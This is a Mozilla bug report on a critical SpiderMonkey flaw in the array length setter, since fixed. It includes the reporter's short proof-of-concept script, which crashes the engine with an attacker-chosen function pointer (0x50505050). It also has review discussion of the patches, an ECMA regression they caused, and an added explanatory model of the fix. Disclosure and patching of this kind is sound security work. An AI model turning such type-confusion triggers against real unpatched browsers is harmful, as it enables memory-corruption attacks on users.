array_length_setter() is exploitable

VERIFIED FIXED in mozilla1.9alpha8

Status


P1
critical
VERIFIED FIXED
11 years ago
9 years ago

People

(Reporter: sync2d, Assigned: brendan)

Tracking

({crash, regression, testcase})

Trunk
mozilla1.9alpha8
crash, regression, testcase
Points:
---
Bug Flags:
blocking1.9 +
wanted1.8.1.x -
in-testsuite +

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:critical] post 1.8-branch)

Attachments

(3 attachments, 2 obsolete attachments)

(Reporter)

Description

11 years ago
$ cat array-length.txt
function exploit() {
  var fun = function () {};
  fun.__proto__ = [];
  fun.length = 0x50505050 >> 1;
  fun();
}
exploit();

$ dbg.obj/js array-length.txt
Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404

$ gdb --eval run --args opt.obj/js array-length.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84)
    at jsinterp.c:3925
3925                    if (fun->flags & JSFUN_INTERPRETED) {
(gdb) print fun
$1 = (JSFunction *) 0x50505050

Updated

11 years ago
Keywords: testcase
Whiteboard: [sg:critical]
(Assignee)

Comment 1

11 years ago
Created attachment 274976 [details] [diff] [review]
fix
Assignee: general → brendan
Status: NEW → ASSIGNED
Attachment #274976 - Flags: review?(igor)
(Assignee)

Updated

11 years ago
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
(Assignee)

Comment 2

11 years ago
Created attachment 274978 [details] [diff] [review]
alterna-fix after discussion with Igor
Attachment #274976 - Attachment is obsolete: true
Attachment #274978 - Flags: review?(igor)
Attachment #274976 - Flags: review?(igor)

Updated

11 years ago
Attachment #274978 - Flags: review?(igor) → review+

Comment 3

11 years ago
Comment on attachment 274976 [details] [diff] [review]
fix

This is OK as a security fix.
Attachment #274976 - Flags: review+

Comment 4

11 years ago
(In reply to comment #3)
> (From update of attachment 274976 [details] [diff] [review])
> This is OK as a security fix.

The problem is that

function F() {} F.prototype = []; var x = new F(); x.length = 10; print(x.length);

now prints 0, not 10 as required by ECMA.
(Assignee)

Comment 5

11 years ago
(In reply to comment #4)
> (In reply to comment #3)
> > (From update of attachment 274976 [details] [diff] [review] [details])
> > This is OK as a security fix.
> 
> The problem is that
> 
> function F() {} F.prototype = []; var x = new F(); x.length = 10;
> print(x.length);
> 
> now prints 0, not 10 as required by ECMA.

I thought this was an old bug, but I was wrong:

$ ../src.ref/Darwin_DBG.OBJ/js
js> function F() {} F.prototype = []; var x = new F(); x.length = 10;
10
js> x.length
10

Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug.

/be
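The two shapes discussed in this bug (the crashing function receiver from the description and the plain-object receiver from comment 4), modelled in JavaScript as an added illustration; this is not SpiderMonkey's code or any of the attached patches. The class tag, the slot names and the three setter modes are constructed, and the 'bail' mode reproduces only the symptom comment 4 reports, not the contents of attachment 274976.

```javascript
// Added model of bug 390598, not SpiderMonkey code; the tag, slot names and
// setter modes are constructed. A "length" setter living on a prototype can be
// reached with a receiver of another class, which is what the testcases do.
const CLASS = Symbol('class');                 // stands in for OBJ_GET_CLASS()
const classOf = o => Object.prototype.hasOwnProperty.call(o, CLASS) ? o[CLASS] : 'Object';

// An "array" keeps its length in slot0; a "function" keeps its callable there.
// The overlap is the point: one slot, a different meaning per class.
const makeArray = proto => Object.assign(Object.create(proto), { [CLASS]: 'Array', slot0: 0 });
const makeFunction = (proto, impl) =>
  Object.assign(Object.create(proto), { [CLASS]: 'Function', slot0: impl });
// The "interpreter": like js_Interpret it trusts a Function's slot0 to be callable.
const callIt = f => (typeof f.slot0 === 'function' ? f.slot0() : 'crash: slot0=' + f.slot0);

// 'unchecked' writes the slot whatever the receiver is (the bug); 'bail' drops the
// write for foreign receivers (the symptom comment 4 reports: length reads 0);
// 'define' gives a foreign receiver an ordinary own property, as ECMA requires.
function makeArrayProto(mode) {
  const proto = {};
  Object.defineProperty(proto, 'length', {
    configurable: true,
    get() { return this.slot0; },
    set(v) {
      if (mode !== 'unchecked' && classOf(this) !== 'Array') {
        if (mode === 'define') {
          Object.defineProperty(this, 'length',
            { value: v, writable: true, enumerable: true, configurable: true });
        }
        return;
      }
      this.slot0 = v >>> 0;                    // the Array-specific write
    },
  });
  return proto;
}

// Replays both shapes from this bug against a setter built in the given mode.
function scenario(mode) {
  const arrayProto = makeArrayProto(mode);
  // comment 4: function F() {} F.prototype = []; var x = new F(); x.length = 10;
  const x = Object.create(makeArray(arrayProto));
  x.length = 10;
  // description: fun.__proto__ = []; fun.length = 0x50505050 >> 1; fun();
  const fun = makeFunction(makeArray(arrayProto), () => 'ok');
  fun.length = 0x50505050 >> 1;
  return { plainLength: x.length, callResult: callIt(fun),
           plainOwn: Object.prototype.hasOwnProperty.call(x, 'length') };
}
```

Only the 'define' mode satisfies both requirements at once: the foreign receiver keeps its own state intact and `x.length` reads back 10.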
(Assignee)

Comment 6

11 years ago
(My ../src.ref/ tree pre-dates last night's landings.)

/be
(Assignee)

Comment 7

11 years ago
Created attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat
Attachment #274978 - Attachment is obsolete: true
Attachment #274983 - Flags: review?(igor)

Comment 8

11 years ago
Comment on attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat

This is a simple and nice workaround.
Attachment #274983 - Flags: review?(igor) → review+
(Assignee)

Updated

11 years ago
Flags: blocking1.9+
(Assignee)

Comment 9

11 years ago
Fixed:

js/src/jsarray.c 3.116

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → FIXED

Comment 10

11 years ago
Created attachment 275372 [details]
js1_5/extensions/regress-390598.js

Comment 11

11 years ago
Created attachment 275373 [details]
ecma_3/Array/regress-390598.js

Updated

11 years ago
Flags: in-testsuite+

Comment 12

11 years ago
verified fixed 1.9.0 linux/mac*/windows.
Status: RESOLVED → VERIFIED
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch

Comment 13

9 years ago
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.